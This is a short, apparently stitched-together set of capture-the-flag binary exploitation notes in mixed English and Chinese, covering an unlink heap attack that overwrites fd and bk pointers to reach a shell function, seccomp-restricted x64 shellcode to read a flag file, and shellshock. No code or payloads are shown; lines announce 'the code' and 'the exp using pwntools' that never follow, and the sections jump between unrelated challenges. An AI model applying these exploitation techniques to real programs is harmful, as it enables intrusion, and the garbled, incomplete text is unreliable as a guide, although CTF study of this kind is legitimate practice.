Here we have a stack address, a heap address and an input now the code
嘛,这可以算做一个 unlink 的入门练习吧,模仿unlink 的操作 you have three chunk, heap1, which you can overwrite. Heap2, av chunk which will be unlink. So, 我们的目标就是通过改写 heap2 的 fd以及 bk 来控制执行流
shell is given
所以所需要做的就是控制执行流跳到 shell 函数即可
pwn step is as below
It seems that we need to send a x64 shellcode to read the flag file with the seccomp sandbox
We can only use read, write, and open syscall
and the code
Okay, it is clear now. You know the file name in /home/asm, the real file is in /home/asm_pwn which need to use the binary to reach.
Now, the exp using pwntools
Well, you need to know the shellshock Vulnerability first.